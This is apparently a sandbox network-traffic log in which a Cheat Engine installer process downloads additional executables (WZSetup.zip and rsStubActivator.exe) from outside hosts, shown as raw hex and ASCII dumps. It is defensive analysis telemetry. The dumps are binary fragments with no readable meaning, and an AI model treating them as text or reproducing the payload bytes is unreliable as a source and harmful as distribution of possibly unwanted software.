2024-12-28 21:21:15 UTC	16384	IN	Data Raw: 6b 51 54 53 c9 9e c0 bc 8a 34 4f 23 16 6f 53 68 0a 51 3e 4f 9c 7a 8e c3 39 0f a0 73 6d 80 c6 94 b0 77 5e e0 e7 25 73 e7 09 1d 78 76 51 3e 4c 02 fc 58 47 b2 2f b3 6b 69 4c 53 50 f5 c2 1e db 84 99 b8 17 f6 03 72 6b bf a2 3c f3 0a 14 e5 df 6c 08 13 e5 13 ae e8 43 94 bf b5 41 17 e5 12 21 64 e7 e5 3a 1a b1 a6 26 04 4f ee e6 7c fe e9 d3 b2 82 2d 29 7b ba ae 35 6b 1e 09 f6 9b 94 62 83 ac 60 bb fa 57 b4 76 26 90 a2 75 74 3d 9e 5e 20 39 01 ea 16 89 56 89 50 ed 39 93 c8 71 2e 1f 92 14 0c f6 1b a8 07 b3 6d fc 11 8f 0f 4f 23 42 67 93 eb 11 32 98 a0 85 ba 8d c3 06 1d b7 64 a8 68 13 c8 4b bd 18 67 e8 7c d0 73 58 24 1c aa e3 67 5e 97 92 6b 88 74 62 75 59 02 3a b1 7a f3 21 33 5f 6e 12 6b 44 08 08 bf f6 9a 9c 58 bd cc e3 d5 6b af 69 3e 2d 59 64 92 d3 59 30 fd c4 ca 8b d9 Data Ascii: kQTS4O#oShQ>Oz9smw^%sxvQ>LXG/kiLSPrk<lCA!d:&O\|-){5kb`Wv&ut=^ 9VP9q.mO#Bg2dhKg\|sX$g^ktbuY:z!3_nkDXki>-YdY0
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: 27 63 a8 f6 09 94 e9 48 00 66 c3 e4 1d 8f ed a2 5a b5 1a 1a 61 53 51 81 3c 84 0e 1d 7d 5b 30 cf 0c 79 26 e2 e1 73 61 85 b9 28 82 b9 c0 b2 d7 40 d9 69 38 1a 25 38 11 45 7c 22 32 60 fc 21 09 f6 2b 36 15 45 38 15 0e 7e 3e 92 2b cf d7 07 f1 57 40 60 33 91 cf 26 a4 0a a7 82 5f 84 a8 54 6f 42 30 2b 32 36 1d 66 01 f5 33 8f 65 b0 73 1a 07 29 98 4e 04 5d 9b bd 6b 55 b2 f8 92 b6 aa b2 9d 14 64 12 dc 34 6d 83 05 79 7a e9 2a b2 22 17 d6 f4 dc 01 fb e7 ab a7 c8 2b 72 49 8a 6d 40 4e 81 97 aa e4 6c 82 7e a6 04 f1 25 a1 bd 0a 64 cb d8 1d 1c 72 3c 24 1b 36 db 39 a4 c0 68 cf 5e 9d 0b bd 34 f8 ce 84 bc a9 b3 81 95 48 86 9a b5 20 0c 15 4c 0f 09 50 32 c4 72 52 c8 82 0c 32 a6 71 5c 4e 0b fc aa 14 e7 75 91 36 60 4b b1 5e f8 72 97 92 a3 c0 11 0c 16 e6 69 45 ff 4f 34 2c 50 97 25 Data Ascii: 'cHfZaSQ<}[0y&sa(@i8%8E\|"2`!+6E8~>+W@`3&_ToB0+26f3es)N]kUd4myz*"+rIm@Nl~%dr<$69h^4H LP2rR2q\Nu6`K^riEO4,P%
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: ef fd 7d 5a 94 bf 42 1b 19 40 59 8d bc 86 26 cb 28 63 e5 24 bd da 69 00 7a f3 0b f4 f9 ae f0 17 f2 ca 49 80 1b 2e f0 82 31 9e 2d 90 57 52 d1 2a b4 d0 0a 7f 92 a5 36 8c 40 7f c4 27 8e e0 fd fe f0 27 72 f0 3a f8 b0 62 bc 53 7c 09 16 c0 08 b0 00 ec cf b7 39 6c 00 ef 37 08 00 54 78 58 ac f0 07 5f a4 2b fc 5f 56 e1 70 a7 14 7c 28 dc e9 08 7e 1b ff 5c 4f df 0e b5 bf f5 f3 67 d2 7e 1c 8a af 69 c8 40 e9 15 69 4b 57 58 a5 a1 ac 42 c4 ec c2 be 42 35 a1 36 03 ed 99 26 f8 0a 03 df 4d 49 fb f5 10 eb eb c8 7e 76 24 78 63 6d a6 17 be 45 22 72 dd fa cc 91 f6 b3 37 c2 e2 b3 5a 19 ca 23 8b 78 05 e9 79 65 da e2 bf b1 8a 6f 20 06 8f 39 cd 36 5a af e1 49 e4 94 fc 79 c9 42 be 22 9c a2 21 0a f9 35 ec c5 38 7b 0a 8d 86 41 44 98 a6 18 9e 8d e1 6e 45 d7 ea 93 f7 bb fd b3 13 8f f8 Data Ascii: }ZB@Y&(c$izI.1-WR*6@''r:bS\|9l7TxX_+_Vp\|(~\Og~i@iKWXBB56&MI~v$xcmE"r7Z#xyeo 96ZIyB"!58{ADnE
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: e4 1f 10 2e 23 e1 04 35 c8 b9 a9 93 73 d3 20 97 a7 4e de 4c b1 5b 50 27 a7 a5 41 be 4c 9d dc 96 f1 a1 12 ee 36 e3 7d 9d 22 55 fa ff d2 76 ed e1 51 15 59 fe 76 a7 93 34 18 b8 0d 24 c2 7c 32 e2 6b d6 ac 30 3b 08 a2 84 06 81 40 f3 10 22 9d 60 82 ba 86 8c 23 62 9b dd f9 04 e9 86 c4 9d 28 d0 c9 c8 dd f2 2a 38 30 e2 08 0a 2e 3b c3 cc e7 8c d1 0d 12 30 3a 1d 60 49 48 22 24 12 99 e8 c4 85 28 6a 65 13 35 48 4c 02 09 f4 9e 73 ea de ee db 8f 3c 7a bf 4f fe 20 7d 1f e7 57 55 e7 9e aa 3a a7 ea 9c 53 81 5f ce c0 af e0 9a 28 7e 20 11 d9 ef 0e dc 0b 78 44 93 a0 e0 a2 95 6b dc 0c 8c e8 f9 87 43 e8 a0 61 65 30 6e 67 5a d8 52 73 f2 a6 16 ff 25 68 ea 09 8c 56 57 e0 9a 55 73 f3 df fb fc 7b 0b 28 36 05 99 ca 24 26 89 0f c8 76 20 2e 06 42 49 1a be b7 d6 b6 5a a1 ab 60 88 fb 30 Data Ascii: .#5s NL[P'AL6}"UvQYv4$\|2k0;@"`#b(*80.;0:`IH"$(je5HLs<zO }WU:S_(~ xDkCae0ngZRs%hVWUs{(6$&v .BIZ`0
2024-12-28 21:21:15 UTC	16384	IN	Data Raw: f2 72 e5 1e e8 a8 94 08 2f ed d8 63 fb 64 44 7b 35 90 af 15 b9 b3 15 ca d8 1a 85 97 6b 81 45 93 59 29 f2 dc 1d a8 48 c5 26 8b 3b 34 7b c0 82 14 6f 8f 75 51 22 b9 dd b8 c2 0a 08 5e 61 35 f6 cb 52 0d 7e 1b 82 9e ee 6b c8 6e 2c 62 20 46 32 cd 6a 6c 04 78 b2 7d 0b 86 7e d8 24 db ab 89 d4 c1 f6 3c 27 dd 17 90 04 c5 5e 59 c4 1c a1 49 1d d0 4c 48 14 b7 90 cf 49 c9 8e 8c fa 8c b9 35 b8 a1 b0 ed 5e fe 20 7c cc d8 4d 3e 86 e2 44 ac c9 68 85 f5 27 60 f3 bb 6f 5c 9d 50 25 76 af 36 65 56 89 14 85 4c 94 e9 88 5e 29 e9 2e 56 4a 68 31 c9 31 ab 2d d0 29 60 a8 42 01 08 c6 87 00 28 56 72 a6 2b 15 de 6c 25 9b 80 cf 8a 35 79 72 c9 8e fc ae cd 98 e0 d9 02 d5 e1 75 83 14 58 b9 34 04 e0 d9 9c 5a cc 1a 37 b7 82 ec 05 64 f0 6e 25 91 7c ab b1 ce d6 e3 9e 1a ee a8 7d 73 46 0f 8b 43 Data Ascii: r/cdD{5kEY)H&;4{ouQ"^a5R~kn,b F2jlx}~$<'^YILHI5^ \|M>Dh'`o\P%v6eVL^).VJh11-)`B(Vr+l%5yruX4Z7dn%\|}sFC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49849	65.9.108.93	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:18 UTC	144	OUT	GET /f/WeatherZero/files/969/WZSetup.zip HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:21:18 UTC	519	IN	HTTP/1.1 200 OK Content-Type: application/zip Content-Length: 6227973 Connection: close Last-Modified: Thu, 08 Dec 2022 09:14:29 GMT x-amz-version-id: s20fxiZKNPOZhn5cscxnL4vQWeKpCNmb Accept-Ranges: bytes Server: AmazonS3 Date: Sat, 28 Dec 2024 09:25:14 GMT ETag: "7cc0288a2a8bbe014f9e344f3068c8f1" X-Cache: Hit from cloudfront Via: 1.1 56706a0e74c90535106878a6a2f1475c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: JlA5TFcWdZ31yA1LUGbUTPm-W6t6zGe63zRSflh8zgRAumw3tDWJgg== Age: 42965
2024-12-28 21:21:18 UTC	16384	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 76 86 87 55 c9 02 ed f5 8d 07 5f 00 10 8b 5f 00 0b 00 00 00 57 5a 53 65 74 75 70 2e 65 78 65 ec bd 7d 78 54 d5 b9 37 bc e7 2b 19 92 09 7b 02 89 46 f9 0a 12 14 0d 52 34 60 89 43 74 02 d9 21 58 06 26 0c 99 81 0a 08 42 70 18 23 a1 c9 de 88 96 e8 84 9d d1 6c 36 63 39 ad 7a 6c 6b 2d 88 3d b5 2d e7 d4 9e 5a a5 ad 8d 19 b0 49 50 d4 f0 51 88 42 6b d4 54 f7 38 51 a3 a4 61 80 98 fd fc ee b5 67 00 cf 79 ce 7b 9e eb b9 de f7 ba de 3f 4e 70 cd 5e 9f f7 5a eb 5e f7 e7 5a 6b 6f 3d df de c5 59 38 8e b3 22 e8 3a c7 ed e7 8c 3f 37 f7 df ff 75 21 8c 9e f4 87 d1 dc 8b a3 de 9c bc df b4 e8 cd c9 cb 82 1b 1b 0b 37 37 d4 df d3 b0 f6 be c2 75 6b 37 6d aa 17 0b ef ae 2d 6c 90 36 15 6e dc 54 58 b1 c4 57 78 5f fd fa da 19 39 39 59 45 29 18 ff 7a d3 f5 Data Ascii: PKvU__WZSetup.exe}xT7+{FR4`Ct!X&Bp#l6c9zlk-=-ZIPQBkT8Qagy{?Np^Z^Zko=Y8":?7u!77uk7m-l6nTXWx_99YE)z
2024-12-28 21:21:19 UTC	10463	IN	Data Raw: 6a f2 fa 47 1c 1c 2a c8 0f d9 c7 36 68 51 4f 32 da e6 b0 d1 77 64 1e 2b 34 1e 4e 1b dd 0a 0b 54 7b a1 21 bd a1 b1 d1 4a 47 68 ac b7 33 13 58 e1 b4 ae 0c 76 1d 65 4c 69 a6 38 7a 72 a5 bd 33 83 0e 51 e3 13 40 d3 06 2b c6 5f 23 1e 7c 84 00 a6 27 72 80 72 3c 34 11 fe a5 5c f5 8d 63 1f 8c aa 49 4d c4 d5 d3 70 9a 7f d9 2a d8 41 c6 53 c0 c3 ac e7 a8 b5 99 7f c9 6b e2 5f 76 9b e5 a4 53 11 fa 1b af 50 5f 2f 7e 17 04 8c 29 d3 f4 30 f4 f8 3e a2 c1 e4 18 c9 11 a2 77 5d 89 8b 97 27 a6 cb ed 5f 22 41 c6 6b ba eb 05 97 75 5d 8a ae 3f 1e d5 94 ea 3a ea 70 ba de 69 78 27 05 99 7f d9 61 0c c2 d3 ae d6 24 8b 7b 2c 47 d4 2e ac 8a d1 a7 9a 8c 7d 6e 93 3f 9e 24 f7 4e 8a b6 64 92 1c 8f ce cd 72 25 f9 47 b7 5d 80 9e 6f ea 77 4a bc 7c ce c4 6f bf 8f 6e 65 6d 7b cc 0e fd a1 47 31 Data Ascii: jG6hQO2wd+4NT{!JGh3XveLi8zr3Q@+_#\|'rr<4\cIMpASk_vSP_/~)0>w]'_"Aku]?:pix'a${,G.}n?$Ndr%G]owJ\|onem{G1
2024-12-28 21:21:19 UTC	16384	IN	Data Raw: 1b fa 16 6c 25 9d 26 9c e4 9d 15 e5 93 ea 24 6d 86 9d b4 9d 6c b4 eb 16 b0 48 9d 0d d5 8a ce 4b f4 f6 72 f2 e1 11 cd e3 0b b3 8a d5 75 9b 36 48 f6 89 6f 72 96 f8 51 d2 7a 83 e4 f4 a6 4d 4e 32 1b 24 e6 16 16 30 7d 95 52 df 12 3d e8 68 84 47 35 4f 2f 2c 54 55 a9 8b 89 cb 4c c9 c8 b4 ca 8a 49 57 8b c9 0c 4b cb f6 c9 fc 28 8e 65 5a 98 aa 56 74 5a 26 87 3a 39 6d db 98 8e 85 85 86 2a 59 d9 6a f5 d9 a9 86 6a f5 ea d6 1a 29 f5 f9 a9 9a 2a 75 d9 3e 62 0c ad 55 d6 f0 05 6c e4 94 a2 db a6 e7 6b ab aa 3a 6b ab a7 aa aa 5a 3b 6b 6a 3b d5 ab 66 d4 d5 3b 5b ab aa b0 92 86 9d 97 94 b3 2c 91 b6 5d 63 db 78 67 43 ed fc 54 ed 74 6d c3 54 4d 43 e7 54 4d ed 7c 6d cd 54 ad 7a 0d 26 af b1 fe 9b 9b d1 d1 c6 1c 5a a7 08 dd e1 7f c3 53 53 73 f3 a4 c2 14 91 0d d7 29 da c2 df 40 47 Data Ascii: l%&$mlHKru6HorQzMN2$0}R=hG5O/,TULIWK(eZVtZ&:9mYjj)u>bUlk:kZ;kj;f;[,]cxgCTtmTMCTM\|mTz&ZSSs)@G
2024-12-28 21:21:19 UTC	16384	IN	Data Raw: db 4f 83 78 4c dd bd e5 c7 8f 3e 1a 6b 29 f5 20 c7 49 d5 b4 e7 c1 b7 c5 9c 7a 91 13 55 11 c5 eb dd f4 9a 5e 41 dd 92 9b d9 dd ad 68 c5 8b 87 56 14 e0 62 00 f8 54 e4 94 f6 dc 43 c5 97 0c 2c aa 9f b6 a1 54 0c c8 42 f4 38 8c 28 4d 90 e2 00 4f 67 c6 94 40 05 88 13 ea e9 cf 48 8f ea fe 3f aa 0e ef b5 ba 53 de cc 6d 1c 49 7a 61 1c c0 fe e5 9d 51 d2 fd 06 80 29 09 8f 1c 8f 7a 69 1c ea 55 84 6c dc 5a a0 8b 4f 92 74 63 c4 c3 9f 23 ea 93 8b 97 7e fd a1 12 14 67 58 67 54 68 fb 68 8e 67 81 7a 32 94 d8 02 e7 a2 25 30 1c c0 19 ec 7d a6 76 64 27 80 12 52 1a a4 8b 39 a3 67 49 fa 83 48 45 40 1a 4d 05 a3 54 e6 07 56 f9 97 25 45 fd 78 88 e2 cb b6 0e 4b 72 cd 6e 87 60 57 fc bb 9d ab 15 a4 cc 4d b6 2f 9e 67 c1 f9 d1 29 d2 50 53 1d 53 6f 27 cb 59 1d 2b b4 f8 9a cb 33 46 09 f3 Data Ascii: OxL>k) IzU^AhVbTC,TB8(MOg@H?SmIzaQ)ziUlZOtc#~gXgThhgz2%0}vd'R9gIHE@MTV%ExKrn`WM/g)PSSo'Y+3F
2024-12-28 21:21:19 UTC	5043	IN	Data Raw: 56 56 8c 67 61 0e 38 a7 51 87 bb 5a 4d ec 57 a9 6a f3 d9 53 22 d0 9d 46 c4 e9 b8 1e bc 93 65 ef ea d9 7b 61 29 51 69 a1 6e 6e 1a 96 aa b3 50 3c 45 f4 4b c8 e2 3c 18 9f d0 e6 29 06 9b 3c d0 b0 37 63 c3 d3 ec 53 3f 4c a4 ea 32 ba 9a e2 b9 db f7 08 3e f2 ae 48 0e 99 76 26 3b 9a 16 16 f5 82 9c 9c f4 e1 ea 4f c3 05 03 6a b3 4c c9 1a e5 7f 6d 32 47 3f 4a 19 51 15 1c 7d a1 43 51 f0 e0 31 1e a1 ec 82 51 a1 8b ae 33 04 e9 fc 4d 9e 02 3b 42 7b e5 85 6c bf ea 44 61 db e0 7f fe b0 bd b4 99 5c ef ad 45 60 39 3c c8 8c e7 d2 6f ec 9c da ae 9e d1 3f 4c 3e a9 f1 a3 b4 9d 37 53 6e 2d 4e 39 49 d7 22 ba 0f b5 e8 b8 51 c9 f9 eb c1 92 ca ce ad e1 a0 ee 48 21 8b ad 91 13 ee ba 50 66 95 6a 6f 8b af b7 81 75 8a be 69 e4 fc 81 bf cc b0 3a f0 9d 15 87 7b 71 55 fd 40 95 ac 7e 21 00 Data Ascii: VVga8QZMWjS"Fe{a)QinnP<EK<)<7cS?L2>Hv&;OjLm2G?JQ}CQ1Q3M;B{lDa\E`9<o?L>7Sn-N9I"QH!Pfjoui:{qU@~!
2024-12-28 21:21:19 UTC	16384	IN	Data Raw: 74 66 23 8a d3 04 5e 2a 2f a1 8f 84 42 53 47 20 56 aa d6 85 4b 69 c2 b7 93 d7 43 da 84 de e6 da 8b 49 a9 5f bd 2c 98 7b 14 1b 66 59 10 ac 4d 3e 6f 28 2f 07 4e 4e 69 2c 7c d9 bd 4c e8 dc 13 8d 44 a4 51 e6 ab 01 4a 76 e6 f9 97 73 22 1f 41 e9 97 aa 88 b1 1f 50 5b 02 77 4d 49 77 1a 96 c8 59 b7 e1 be a2 6d a2 84 5a 61 d9 2a df 84 8b a2 a3 7f 22 bd 84 a7 68 df 1a b3 87 ed 4e 5d 49 fa 9e 5c a0 33 21 2a fe 9a e6 ad 90 53 c9 93 c3 10 7e 2b 31 12 33 9c c5 13 b3 5e c4 d1 fc 49 71 9d 07 78 b8 5a cf ea 46 eb 59 bf 0b e7 f7 6e 1b e1 f7 92 85 87 47 35 9b 38 0b 6e 7b 02 16 51 eb fe 8b 51 f4 d7 ae 39 26 4b 50 68 0e be 34 aa 9b 05 ab 0f 34 14 4f 59 65 84 7e 55 14 c3 82 ec 9e ab 4a 9d 9e ee 01 fe 23 ba 58 ce c9 06 bb e8 e0 4d 66 0d 39 db a4 47 d5 fe 28 f9 e5 21 df 69 96 40 Data Ascii: tf#^/BSG VKiCI_,{fYM>o(/NNi,\|LDQJvs"AP[wMIwYmZa"hN]I\3!*S~+13^IqxZFYnG58n{QQ9&KPh44OYe~UJ#XMf9G(!i@
2024-12-28 21:21:19 UTC	16384	IN	Data Raw: 31 e0 d3 c8 fe 8e 3f 53 7e 9c 5f 55 f0 05 c4 16 9e 88 3f 47 fc 17 b9 85 6e bd a8 57 89 ae 80 83 d4 9d 78 17 07 06 87 cf 1d 7c da 90 78 c7 96 2d 85 01 cf 8e b1 4f 19 69 14 bf 07 f9 9d 39 99 aa ce 77 01 71 bd e7 97 7f d9 e3 ae 21 3f 31 4f 5d 18 19 de 42 8d fc f2 aa af f3 26 28 7d b8 33 ca 30 e3 48 95 20 1e ce 1d 12 d0 5a 73 c3 f4 de f0 0f 7b ae 45 b9 48 00 13 21 bc e9 6b a1 48 b2 dc 5b b0 84 81 a3 dc 35 df 2a 4f 1b ec 84 c8 67 01 27 aa 04 be f8 f9 7e 05 63 ac 5e 58 3e 1e f5 5a 72 81 dd 19 ca 17 e5 59 c7 e9 ac 7b de 1e 7e 63 9e 87 8c 0f 20 d8 23 f7 a3 ef 3a 15 ab 02 16 00 3b 8b a4 79 1e 26 dd 80 93 55 10 20 29 b7 ba 62 e0 ae 8b 5c 37 e6 e4 bc ff 0b 7d 28 13 36 93 b8 b3 0b 43 32 11 19 20 65 7a 55 43 ee da b0 16 2f 76 de d8 5e d2 a2 a4 da 9c 0c 84 1e 09 5e ca Data Ascii: 1?S~_U?GnWx\|x-Oi9wq!?1O]B&(}30H Zs{EH!kH[5*Og'~c^X>ZrY{~c #:;y&U )b\7}(6C2 ezUC/v^^
2024-12-28 21:21:19 UTC	11977	IN	Data Raw: eb c5 c6 c7 41 5b 65 30 85 08 d7 07 e1 a8 68 f5 b8 3a 66 4c 60 42 dc 6c 00 07 bc 98 37 6e f8 5e c6 6f 5f ad 16 5e 7a 6a ed 74 6e 54 4b 33 a7 26 5e e1 76 4c c5 d8 c1 5e be d0 e7 c4 bc 01 33 58 0a 9b 86 28 9f ba 66 d5 48 ed 0f f7 3f 9b e1 ef 99 0d 11 35 d3 eb 7e 23 32 e6 e4 74 e3 ab 20 5e 93 32 f5 82 ce 25 09 32 6c 10 f2 be ce 8a 7d ef 94 7a 05 98 bd 62 45 cd bb c9 c6 65 da 90 5f 2b f2 86 57 86 4b 69 95 b0 b2 a7 db a0 ef e8 8f aa c7 bd f9 f6 4a bc e1 8d d2 04 66 95 17 94 81 c3 f8 2a db 7c 8d d2 8b b4 19 36 e4 43 f8 2a a1 23 f8 2a 79 8b 45 f5 d2 8b 45 5f 4b a2 0b 9c fb ce 42 2f 34 69 aa 5e 6d f6 ea 35 9d 9f 86 2b ba 02 bd 9f 6f 62 ba 8e f1 2d 0f ce f2 3a ff 6e c4 1f 4c 54 38 3d cf af 07 ba ef 4c b6 bf dc fd 74 6b 57 dd 3c bf 54 c9 26 5a f4 2c 60 7d 9c 5f 9f Data Ascii: A[e0h:fL`Bl7n^o_^zjtnTK3&^vL^3X(fH?5~#2t ^2%2l}zbEe_+WKiJf\|6C#*yEE_KB/4i^m5+ob-:nLT8=LtkW<T&Z,`}_
2024-12-28 21:21:19 UTC	16384	IN	Data Raw: a8 a1 12 a2 15 dc 36 7f d9 04 f8 5b bc 5b 42 ef 49 3f b6 58 78 23 0a 46 fc 6e e0 ed cf c8 2b 55 b6 85 d1 c1 5a 02 70 1a fc 0c 58 83 50 74 a0 ce 75 7e f5 9c f5 ad 1a 51 7a 9b 25 f4 ae 94 18 52 d3 12 91 ff 33 4a 4f b3 a8 65 5b 37 f5 48 e0 b1 38 c3 86 87 e4 ce 5b eb 48 a2 a7 a1 45 50 50 a5 12 f3 23 3f 55 0e 78 c8 29 b8 91 a4 d6 ca 39 58 3d 68 b9 cc 29 78 3e 6e 9f 06 06 37 23 6f 17 d3 79 8e 86 9b fa 5b 29 e1 1f 35 23 3d 93 e9 70 7e 45 cc 2a e4 98 e4 38 50 56 84 de 5c 80 97 38 07 c4 9b ec a3 f0 89 2c 2d 2d 27 ba a9 b1 0e 15 b6 a3 cc 16 55 75 02 4a 58 05 ca 74 d8 f2 7c eb 65 a9 71 a4 9b c7 b6 95 30 13 82 e0 2b 01 e0 86 27 71 61 a6 0b 63 a2 63 6e 21 f9 30 01 3b 49 5a 5c a5 73 d4 86 75 89 dc d1 2a 79 29 6a f1 f6 87 54 b7 7b 09 9e 64 61 cd 86 99 94 ec a4 1a c8 6b Data Ascii: 6[[BI?Xx#Fn+UZpXPtu~Qz%R3JOe[7H8[HEPP#?Ux)9X=h)x>n7#oy[)5#=p~E8PV\8,--'UuJXt\|eq0+'qaccn!0;IZ\suy)jT{dak
2024-12-28 21:21:19 UTC	16384	IN	Data Raw: 9b 4b c2 56 0e ef 3f 32 0e 11 1e 4c 6b da 85 f9 17 9e 3e 3d 36 1e 21 c1 92 00 5e 8b 07 af 0d dd 0f d0 6f 9f e2 93 ac 70 8f e4 b8 92 25 2f 2b 3c 9c 27 00 cf 54 cd 2f 7c b3 d7 ef 70 f4 ef 7c c4 ae 0c ef a4 be 2a b4 27 5f 88 9f 95 4e 82 ed df c7 ce 94 62 94 88 b0 64 0f 31 65 f5 52 b8 bf 75 ef 0f 8b 62 92 cf 1b 3e 75 2c 4b e5 ad c1 97 6d be 19 59 27 50 d7 23 d4 2b 99 2b 21 a1 48 5f 63 ab c9 9e 76 9f 7f ce 74 3a 3c 5b 87 b8 ef b9 0f 6e e8 2e 5e d8 a0 d3 4d ca 66 cd d6 0b 1a b1 ac cd d0 3e 21 35 bf ef 51 3c ed cc 79 e3 e9 84 1b 31 61 05 74 c1 cc 4f 84 47 39 20 ed e5 19 a9 f7 22 bb 00 07 9e be 98 03 eb e7 9a f1 5a 5e 09 bd de 78 92 1e 1d 7c 52 8e 86 22 d3 bc 59 75 26 5e 6a dd 5e 10 4f 1c 0c a6 2b 01 dd bb be 0f eb 64 15 23 8a 54 27 53 09 7d 51 fc 16 31 c9 f6 a3 Data Ascii: KV?2Lk>=6!^op%/+<'T/\|p\|*'_Nbd1eRub>u,KmY'P#++!H_cvt:<[n.^Mf>!5Q<y1atOG9 "Z^x\|R"Yu&^j^O+d#T'S}Q1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49873	18.66.161.123	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:21:31 UTC	124	OUT	GET /rsStubActivator.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: shield.reasonsecurity.com
2024-12-28 21:21:32 UTC	1137	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 33432 Connection: close Date: Sat, 28 Dec 2024 21:21:32 GMT ETag: W/"8298-2NTUORvMsBADBlWTtxnmV2euzwM" Access-Control-Allow-Origin: * Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 0 content-disposition: attachment; filename=rsStubActivator.exe X-Cache: Miss from cloudfront Via: 1.1 53f7f921dde38b550ad3de5c10255716.cloudfront.net (CloudFront) X-Amz-Cf-Pop: BAH52-C1 X-Amz-Cf-Id: 7JkH8yKWjMyuAPNP0mGaUKjU9OOgBe7z3PIGXIE1ikz6-0Xtd8FoSg==
2024-12-28 21:21:32 UTC	3376	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a9 ef 9a d4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 12 00 00 00 16 00 00 00 00 00 00 4e 31 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 88 4f 01 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0N1 @@ O`
2024-12-28 21:21:32 UTC	16384	IN	Data Raw: 72 00 52 73 53 74 75 62 73 41 63 74 69 76 61 74 6f 72 00 72 73 53 74 75 62 73 41 63 74 69 76 61 74 6f 72 00 2e 63 74 6f 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 50 72 6f 64 75 63 74 50 72 6f 70 65 72 74 69 65 73 00 61 72 67 73 00 52 75 6e 50 61 72 61 6d 73 00 72 75 6e 50 61 72 61 6d 73 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 00 70 72 6f 70 73 00 50 72 6f 63 65 73 73 00 73 65 74 5f 41 72 67 75 6d 65 6e 74 73 00 41 64 64 50 61 72 61 6d 54 6f 51 75 65 72 79 49 66 4e 6f 74 45 78 69 73 74 73 Data Ascii: rRsStubsActivatorrsStubsActivator.ctorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModesProductPropertiesargsRunParamsrunParamsSystem.CollectionspropsProcessset_ArgumentsAddParamToQueryIfNotExists
2024-12-28 21:21:32 UTC	13672	IN	Data Raw: 9d 3a a3 d5 03 e0 bf f0 a2 3c ca 42 dc 18 48 7f 14 34 cf d2 4c ab ef 9b 3d fe 0e b8 64 2a fa 75 28 24 41 ed 42 bf 05 9c 66 49 52 50 f4 51 f3 36 49 4d 8b 20 d2 2c 57 35 79 2b a8 f3 45 60 bc 23 8d 58 f7 dc 61 de 93 fe 39 c0 f9 b2 30 a5 4c d7 e9 98 4a 58 3e d3 03 88 fe b3 8f d3 5e 4b 76 12 51 93 c9 8c 0c 3b 5b 8a 22 a8 c1 26 08 f9 14 10 12 03 7d 5f 23 bb 64 e3 63 e0 a6 e1 3e f6 c2 74 b2 3f 1e 09 76 ec ab 5d 46 75 e2 60 a3 58 09 01 28 00 0e 84 54 ee ce e9 5d c8 5e 30 12 bd 46 9e b5 d3 76 b9 d2 0e 6b 99 0c d2 33 b4 cd b1 02 03 01 00 01 a3 82 01 5d 30 82 01 59 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d 0e 04 16 04 14 ba 16 d9 6d 4d 85 2f 73 29 76 9a 2f 75 8c 6a 20 8f 9e c8 6f 30 1f 06 03 55 1d 23 04 18 30 16 80 14 ec d7 e3 82 Data Ascii: :<BH4L=d*u($ABfIRPQ6IM ,W5y+E`#Xa90LJX>^KvQ;["&}_#dc>t?v]Fu`X(T]^0Fvk3]0Y0U00UmM/s)v/uj o0U#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49887	65.9.108.93	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

